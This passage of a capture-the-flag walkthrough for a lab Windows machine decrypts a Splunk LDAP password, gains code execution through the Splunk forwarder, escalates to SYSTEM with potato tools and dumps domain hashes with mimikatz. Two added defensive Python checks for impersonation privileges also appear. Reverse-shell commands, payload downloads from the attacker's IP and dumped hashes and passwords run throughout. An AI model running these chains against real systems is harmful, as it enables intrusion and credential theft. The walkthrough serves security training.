Candidates.#1....: $HEX[213330383839] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 51c Fan: 45% Util: 94% Core:2760MHz Mem:8251MHz Bus:8

Started: Wed Apr 02 04:22:00 2025
Stopped: Wed Apr 02 04:24:57 2025
PS C:\Users\sckull\Documents\hashcat-6.2.6>

Splunk Secrets

Searching for bindDNpassword with grep we see multiple files.

❯ grep -color -iwr 'bindDNpassword'
var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
var/run/splunk/confsnapshot/baseline_default/system/default/server.conf
var/run/splunk/merged/server.conf
var/lib/splunk/_configtracker/db/db_1722472274_1722472274_1/rawdata/0
var/lib/splunk/_configtracker/db/db_1722816408_1722816408_2/rawdata/0
var/lib/splunk/_configtracker/db/hot_v1_3/rawdata/0
var/lib/splunk/_configtracker/db/hot_v1_3/1722932036-1722932036-10796068698853212442.tsidx
var/lib/splunk/_configtracker/db/db_1722374849_1722374525_0/merged_lexicon.lex
var/lib/splunk/_configtracker/db/db_1722374849_1722374525_0/1722374560-1722374525-11402003354716798095.tsidx
var/log/splunk/configuration_change.log
etc/system/README/authentication.conf.example
etc/system/README/authentication.conf.spec
etc/system/default/server.conf

authentication.conf contains the encrypted password.

❯ cat var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]

minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0


[Haze LDAP Auth]

SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

We run splunksecrets with the .secret file and the ciphertext, and it returns the password.

❯ splunksecrets splunk-decrypt -S etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI=' 2>/dev/null
Sp1unkadmin@2k24

Splunk Access

The credential pair admin : Sp1unkadmin@2k24 gives us access to the Splunk dashboard.

image

Splunk UF - RCE

The Splunk API allows "installing scripts" remotely through the Splunk UF, which results in command execution, as described in Abusing Splunk Forwarders For Shells and Persistence.

We run PySplunkWhisperer2_remote with the admin credentials, specifying the lhost and a payload defined as a ping to our machine.

❯ python test.py --host 10.10.11.61 --username admin --password 'Sp1unkadmin@2k24' --payload 'ping 10.10.14.105' --lhost 10.10.14.105
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp4exf966f.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.105:8181/
10.10.11.61 - - [03/Apr/2025 06:39:49] "GET / HTTP/1.1" 200 -

[+] App installed, your code should be running now!

Press RETURN to cleanup
[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

After running it we see the ping succeed in tcpdump.

❯ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
06:37:36.209153 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1488, length 40
06:37:36.209220 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1488, length 40
06:37:37.174422 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1489, length 40
06:37:37.174443 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1489, length 40
06:37:38.084975 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1490, length 40
06:37:38.084998 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1490, length 40
06:37:38.998751 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1491, length 40
06:37:38.998773 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1491, length 40

Shell

We run a PowerShell reverse shell generated with revshells.

❯ python PySplunkWhisperer2_remote.py --host 10.10.11.61 --username admin --password 'Sp1unkadmin@2k24' --payload 'powershell -e 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' --lhost 10.10.14.105
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpslj2a4as.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.105:8181/
10.10.11.61 - - [03/Apr/2025 06:37:58] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

We gain access as alexander.green.

❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.105] from haze.htb [10.10.11.61] 53613
PS C:\Windows\system32> whoami
haze\alexander.green
PS C:\Windows\system32>

Privesc

Enumerating alexander's privileges we see that SeImpersonatePrivilege is enabled.

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\>

There are multiple tools that exploit this privilege.
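The privilege that every Potato variant relies on is normally held only by Administrators, LOCAL SERVICE, NETWORK SERVICE and the SERVICE group, and a service process started by the Service Control Manager carries the SERVICE group in its token, which is why a service account such as the one running the Splunk forwarder above holds it without any explicit grant. A defender therefore checks two things: that nobody has been added to "Impersonate a client after authentication" by policy, and that services run under accounts whose compromise is contained. The following added example, not part of the original writeup, covers the first check by parsing the [Privilege Rights] section that `secedit /export /cfg <file>` writes and reporting holders of the two impersonation rights beyond the default set; the sample export is constructed and the extra SID S-1-5-21-0-0-0-1234 is a placeholder for a domain account.

```python
"""Report non-default holders of token-impersonation rights from a secedit export.

Added example, not from the writeup. SAMPLE_EXPORT is constructed in the
layout of `secedit /export /cfg out.inf`; the S-1-5-21-0-0-0-1234 SID is a
placeholder for a domain principal.
"""

# Default (and CIS-recommended) holders: Administrators (S-1-5-32-544),
# LOCAL SERVICE (S-1-5-19), NETWORK SERVICE (S-1-5-20) and SERVICE (S-1-5-6).
BASELINE = {
    "SeImpersonatePrivilege": {"S-1-5-32-544", "S-1-5-19", "S-1-5-20", "S-1-5-6"},
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
}

SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-19,*S-1-5-20,*S-1-5-6,*S-1-5-21-0-0-0-1234
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(text):
    """Return {privilege: set of SIDs or account names} from [Privilege Rights]."""
    rights = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # secedit writes SIDs with a leading '*'; unresolved accounts appear by name.
        rights[name.strip()] = {v.strip().lstrip("*") for v in value.split(",") if v.strip()}
    return rights


def excess_holders(text):
    """Principals holding an impersonation right beyond the baseline, per privilege."""
    rights = parse_privilege_rights(text)
    result = {}
    for privilege, allowed in BASELINE.items():
        extra = rights.get(privilege, set()) - allowed
        if extra:
            result[privilege] = sorted(extra)
    return result


if __name__ == "__main__":
    for privilege, holders in excess_holders(SAMPLE_EXPORT).items():
        print(f"{privilege}: unexpected holders {', '.join(holders)}")
```

A clean result from this check does not mean no service account can impersonate; it means the policy has not been widened. Containing the second path is about how the service itself is run: a virtual account or gMSA that is not also a domain user with WinRM and file access limits what a Potato-style escalation from the service can reach.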

GodPotato

We use GodPotato to launch a reverse shell with a static netcat binary.

PS C:\Users\alexander.green\Documents> (New-Object Net.WebClient).DownloadFile("http://10.10.14.105/GodPotato-NET4.exe", "C:/Users/alexander.green/Documents/God.exe")
PS C:\Users\alexander.green\Documents> dir


    Directory: C:\Users\alexander.green\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          4/3/2025   6:16 AM          57344 God.exe                                                              


PS C:\Users\alexander.green\Documents> .\God.exe
                                                                                               
    FFFFF                   FFF  FFFFFFF                                                       
   FFFFFFF                  FFF  FFFFFFFF                                                      
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF                
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF                
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF                
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF   
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF  
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF  
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF 
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF 
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF 
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF  
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF   
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF    


Arguments:

	-cmd Required:True CommandLine (default cmd /c whoami)

Example:

GodPotato -cmd "cmd /c whoami" 
GodPotato -cmd "cmd /c whoami" 

PS C:\Users\alexander.green\Documents>

GodPotato does not show the output of the whoami command, but it does show that the process was started as SYSTEM.

PS C:\Users\alexander.green\Documents> .\God.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140721718886400
[*] DispatchTable: 0x140721721477448
[*] UseProtseqFunction: 0x140721720769344
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\44a23618-0b0b-419b-b4c5-a252bc84b188\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004002-04f8-ffff-3bbc-906ee4065f4b
[*] DCOM obj OXID: 0xbc3fdfaaf0e0599c
[*] DCOM obj OID: 0xcfe3ee07cf6d669
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 940 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 7288
PS C:\Users\alexander.green\Documents>

Shell

We launch a reverse shell.

PS C:\Users\alexander.green\Documents> (New-Object Net.WebClient).DownloadFile("http://10.10.14.105/nc.exe","C:\Users\alexander.green\Documents\nc.exe")
PS C:\Users\alexander.green\Documents> .\gd.exe -cmd "C:\Users\alexander.green\Documents\nc.exe -e cmd.exe 10.10.14.105 1339"

We gain access to the root.txt flag.

❯ rlwrap nc -lvp 1339
listening on [any] 1339 ...
connect to [10.10.14.105] from haze.htb [10.10.11.61] 55648
Microsoft Windows [Version 10.0.20348.3328]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami

C:\Windows\system32>cd C:/Users/Administrator/Desktop
cd C:/Users/Administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3985-943C

 Directory of C:\Users\Administrator\Desktop

03/05/2025  06:46 PM    <DIR>          .
03/05/2025  12:29 AM    <DIR>          ..
04/02/2025  07:02 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,377,016,832 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1ee98fc6b5b51fc7aaa6c2b0f07317a

C:\Users\Administrator\Desktop>

The shell we got shows neither the user nor the privileges.

C:\Windows\system32>whoami
whoami

C:\Windows\system32>whoami /all
whoami /all

C:\Windows\system32>

The same happens when launching a shell with netcat.

# python PySplunkWhisperer2_remote.py --host 10.10.11.61 --username admin --password 'Sp1unkadmin@2k24' --payload 'certutil.exe -urlcache -split -f http://10.10.14.105/nc.exe C:\Users\alexander.green\Documents\nc.exe && C:\Users\alexander.green\Documents\nc.exe -e cmd.exe 10.10.14.105 1336' --lhost 10.10.14.105
C:\Users\alexander.green\Documents>gd.exe -cmd "cmd /c whoami > C:\Users\alexander.green\Documents\a.txt"
gd.exe -cmd "cmd /c whoami > C:\Users\alexander.green\Documents\a.txt"
[*] CombaseModule: 0x140734260314112
[*] DispatchTable: 0x140734262905160
[..] snip [..]
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2916

C:\Users\alexander.green\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3985-943C

 Directory of C:\Users\alexander.green\Documents

04/09/2025  09:45 AM    <DIR>          .
03/05/2025  12:46 AM    <DIR>          ..
04/09/2025  09:44 AM                 0 a.txt
04/09/2025  09:29 AM            57,344 gd.exe
04/09/2025  09:34 AM            59,392 nc.exe
               3 File(s)        116,736 bytes
               2 Dir(s)   4,215,869,440 bytes free

C:\Users\alexander.green\Documents>type a.txt
type a.txt

C:\Users\alexander.green\Documents>icacls a.txt
icacls a.txt
a.txt NT AUTHORITY\SYSTEM:(I)(F)
      BUILTIN\Administrators:(I)(F)
      HAZE\alexander.green:(I)(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\alexander.green\Documents>

SharpEfsPotato - Privileged

We try SharpEfsPotato, transferring it to the machine.

PS C:\Users\alexander.green\Documents> (New-Object Net.WebClient).DownloadFile("http://10.10.14.105/SharpEfsPotato.exe","C:\Users\alexander.green\Documents\SharpEfsPotato.exe")
PS C:\Users\alexander.green\Documents> .\SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -h, --help                 Display this help
PS C:\Users\alexander.green\Documents>

We run a whoami; this time we see that SYSTEM executes it.

PS C:\Users\alexander.green\Documents> .\SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\Users\alexander.green\Documents\w.log"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/176f0f62-b5c3-4a7a-954f-e431c7cfb4d6/\176f0f62-b5c3-4a7a-954f-e431c7cfb4d6\176f0f62-b5c3-4a7a-954f-e431c7cfb4d6
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
PS C:\Users\alexander.green\Documents> dir


    Directory: C:\Users\alexander.green\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          4/9/2025   9:29 AM          57344 gd.exe                                                               
-a----          4/9/2025   9:34 AM          59392 nc.exe                                                               
-a----          4/9/2025   9:49 AM          70656 SharpEfsPotato.exe                                                   
-a----          4/9/2025   9:50 AM             21 w.log                                                                


PS C:\Users\alexander.green\Documents> type w.log
nt authority\system
PS C:\Users\alexander.green\Documents>

Shell

We launch a reverse shell using the netcat binary already present on the machine.

PS C:\Users\alexander.green\Documents> .\SharpEfsPotato.exe -p C:\Users\alexander.green\Documents\nc.exe -a "-e powershell.exe 10.10.14.105 1337"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/3d1e638d-04c8-4542-b035-b7c7355fdf7a/\3d1e638d-04c8-4542-b035-b7c7355fdf7a\3d1e638d-04c8-4542-b035-b7c7355fdf7a
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
PS C:\Users\alexander.green\Documents>

We see that our shell now has all privileges.

❯ rlwrap nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.105] from haze.htb [10.10.11.61] 58571
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
e1ee98fc6b5b51fc7aaa6c2b0f07317a
PS C:\Windows\system32>
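A defender-side triage helper, added here and not part of the original writeup: it parses the `whoami /priv` table shown above and reports which of the held privileges give a path to SYSTEM, SeImpersonatePrivilege being the one SharpEfsPotato relies on. The risk list and the sample output (a service-account style token) are constructed for this example.

```python
import re

# Privileges whose holder can reach SYSTEM; SeImpersonatePrivilege is the one
# SharpEfsPotato abuses. This list is the example's own and is not exhaustive.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate authenticated clients (potato-style escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign an arbitrary primary token to a new process",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeDebugPrivilege": "open and manipulate SYSTEM processes",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
}

# One row of the `whoami /priv` table: name, free-text description, state.
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")

def parse_whoami_priv(output: str) -> dict:
    """Return {privilege: (description, state)} from raw `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_ROW.match(line.strip())
        if m:
            privs[m.group(1)] = (m.group(2), m.group(3))
    return privs

def triage(output: str) -> list:
    """List (privilege, state, why it matters) for every high-risk privilege held."""
    # A 'Disabled' privilege is still held by the token and the process can
    # enable it itself, so it is reported alongside the 'Enabled' ones.
    held = parse_whoami_priv(output)
    return [(name, held[name][1], why)
            for name, why in HIGH_RISK_PRIVILEGES.items() if name in held]

# Constructed sample in the layout whoami /priv prints for a service account.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""
if __name__ == "__main__":
    for name, state, why in triage(SAMPLE):
        print(f"{name:<30} {state:<9} {why}")
```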

Dump Hashes

As Administrator we run mimikatz to dump the domain hashes.

PS C:\Users\Administrator\Documents> certutil.exe -urlcache -split -f http://10.10.14.105/mimikatz.exe mim.exe
certutil.exe -urlcache -split -f http://10.10.14.105/mimikatz.exe mim.exe
****  Online  ****
  000000  ...
  108c00
CertUtil: -URLCache command completed successfully.
PS C:\Users\Administrator\Documents> dir
dir


    Directory: C:\Users\Administrator\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          4/9/2025  10:00 AM        1084416 mim.exe                                                              


PS C:\Users\Administrator\Documents> .\mim.exe
.\mim.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::dcsync /domain:haze.htb /ALL /CSV
[DC] 'haze.htb' will be the domain
[DC] 'dc01.haze.htb' will be the DC server
[DC] Exporting domain 'haze.htb'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	937e28202a6cdfcc556d1b677bcbe82c	514
1000	DC01$	9dcbc33adec3bdc8b2334060002ce1b4	532480
500	Administrator	06dc954d32cb91ac2831d67e3e12027f	66048
1111	Haze-IT-Backup$	a70df6599d5eab1502b38f9c1c3fd828	4096
1103	paul.taylor	e90878e2fb0a21a11859ff60f1119fb4	66048
1104	mark.adams	e90878e2fb0a21a11859ff60f1119fb4	66048
1105	edward.martin	09e0b3eeb2e7a6b0d419e9ff8f4d91af	66048
1106	alexander.green	6b8caa0cd4f8cb8ddf2b5677a24cc510	66048

mimikatz #

Written by sckull (Dany Sucuc)